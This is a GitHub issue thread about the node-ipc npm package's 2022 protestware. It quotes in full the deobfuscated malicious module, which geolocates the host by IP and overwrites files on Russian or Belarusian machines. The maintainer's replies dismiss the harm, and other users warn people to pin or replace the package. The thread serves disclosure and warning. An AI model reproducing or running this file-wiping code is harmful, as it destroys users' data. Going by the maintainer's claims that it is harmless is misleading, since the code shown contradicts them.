### ISSUE TITLE
A package should never try to do unrelated things.

### ISSUE THREAD

**Issue by Mister-Hope** [RIAEvangelist/node-ipc#236] opened 2022-03-15 14:17 UTC
Give people a hamburger when they want one, do not try giving them a humberger with some shits.

**Comment by magicdawn** [comment] 2022-03-15 15:00
And How dare you touch user's onedrive folder, it's privacy. that's awful.

**Comment by lorand-horvath** [comment] 2022-03-15 15:04
Yeah, found a 'WITH-LOVE-FROM-AMERICA.txt' file on my desktop as well. Pretty tasteless stuff, I thought I installed some kind of malware.

**Comment by Chaoses-Ib** [comment] 2022-03-15 16:09
Possible duplicate of #233

**Comment by Mister-Hope** [comment] 2022-03-15 17:05
Try see the following from @MidSpike

----

@RIAEvangelist
I did some digging into recent commits in this repository.

What the actual f--k are you doing here:
# ⚠️| The following code is malicious, DO NOT RUN IT
https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
# ⚠️| The above code is malicious, DO NOT RUN IT

I deobfuscated the code and found out that if the host machine's ip address was from Russia or Belarus, your code would proceed to nuke their files by overwriting everything:
![image](https://user-images.githubusercontent.com/22574513/158421231-0b420fdb-8bbe-4818-9057-2a27fc46f7ac.png)

# ⚠️| The following code is malicious, DO NOT RUN IT
```js
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
    const t = Math.round(Math.random() * 4);
    if (t > 1) {
        return;
    }
    const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
    o.get(n.toString("utf8"), function (t) {
        t.on("data", function (t) {
            const n = Buffer.from("Li8=", "base64");
            const o = Buffer.from("Li4v", "base64");
            const r = Buffer.from("Li4vLi4v", "base64");
            const f = Buffer.from("Lw==", "base64");
            const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
            const e = Buffer.from("cnVzc2lh", "base64");
            const i = Buffer.from("YmVsYXJ1cw==", "base64");
            try {
                const s = JSON.parse(t.toString("utf8"));
                const u = s[c.toString("utf8")].toLowerCase();
                const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
                if (a) {
                    h(n.toString("utf8"));
                    h(o.toString("utf8"));
                    h(r.toString("utf8"));
                    h(f.toString("utf8"));
                }
            } catch (t) {}
        });
    });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
    if (!a.existsSync(n)) {
        return;
    }
    let r = [];
    try {
        r = a.readdirSync(n);
    } catch (t) {}
    const f = [];
    const c = Buffer.from("4p2k77iP", "base64");
    for (var e = 0; e < r.length; e++) {
        const i = u.join(n, r[e]);
        let t = null;
        try {
            t = a.lstatSync(i);
        } catch (t) {
            continue;
        }
        if (t.isDirectory()) {
            const s = h(i, o);
            s.length > 0 ? f.push(...s) : null;
        } else if (i.indexOf(o) >= 0) {
            try {
                a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️`
            } catch (t) {}
        }
    }
    return f;
}
const ssl = true;
export { ssl as default, ssl };
```
# ⚠️| The above code is malicious, DO NOT RUN IT

The following are excerpts from the malicious code:
```js
Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
// https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
```
```js
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
// checks if ip country is Russia or Belarus
```
```js
a.writeFile(i, c.toString("utf8"), function () {});
// overwrites file with `❤️`
```

You should be ashamed of yourself, this level of gross malice towards fellow developers is not ok.

_Originally posted by @MidSpike in https://github.com/RIAEvangelist/node-ipc/issues/233#issuecomment-1068182278_

**Closed** 2022-03-15 17:32 UTC

**Comment by WangShuXian6** [comment] 2022-03-16 00:58
This is fucking insane, changing my private files is a crime! The npm package is now associated with a virus and I will not use packages that depend on third party packages or packages with obfuscated code. I will have to reorganise my project into a monorepo project and implement all the functionality myself. node will have to implement package permission related functionality now.

**Comment by RIAEvangelist** [comment] 2022-03-16 20:47
all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented. 

you can lock your deps if you like. There are many modules out there that do actual harm, like steal your AWS or other private keys silently.

**Comment by MidSpike** [comment] 2022-03-16 20:50
> all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented.
> 
> you can lock your deps if you like. There are many modules out there that do actual harm, like steal your AWS or other private keys silently.

You need to stop pretending like you aren't aware why people are angry at you:
https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c

**Comment by RIAEvangelist** [comment] 2022-03-16 20:55
again;

all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented.

feel free to lock package dep versions if you do not like

**Comment by MidSpike** [comment] 2022-03-16 20:56
> again;
> 
> all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented.
> 
> feel free to lock package dep versions if you do not like

@RIAEvangelist once again, you have failed to understand that the primary reason why people are upset is this https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c

**Comment by RIAEvangelist** [comment] 2022-03-16 20:57
that code is not executable unless you modify it to make it so.

**Comment by MidSpike** [comment] 2022-03-16 21:02
> that code is not executable unless you modify it to make it so.

I'm tired of arguing with you.

I want you to prove that it is not executable within this commit range on the master branch:
`847047cf7f81ab08352038b2204f0e7633449580 -> 6e344066a0464814a27fbd7ca8422f473956a803`
https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580
https://github.com/RIAEvangelist/node-ipc/commit/6e344066a0464814a27fbd7ca8422f473956a803

**Comment by joshuaalayon** [comment] 2022-03-17 21:01
Be aware - this package was found to contain malware that detects its users machines purported geographical location and replaces the data from the machine if it does not like the location it detects

If you are still using this package - you may do better by locking it to an older version or, preferably, replacing it altogether along with all software maintained by the repos maintainer(s)

https://www.bleepingcomputer.com/news/security/big-sabotage-famous-npm-package-deletes-files-to-protest-ukraine-war/amp/

**Comment by ARitz-Cracker** [comment] 2022-03-18 02:59
Imagine thinking that Geo-IP is accurate when there's a multiple months long waitlist for IPv4 address allocation.
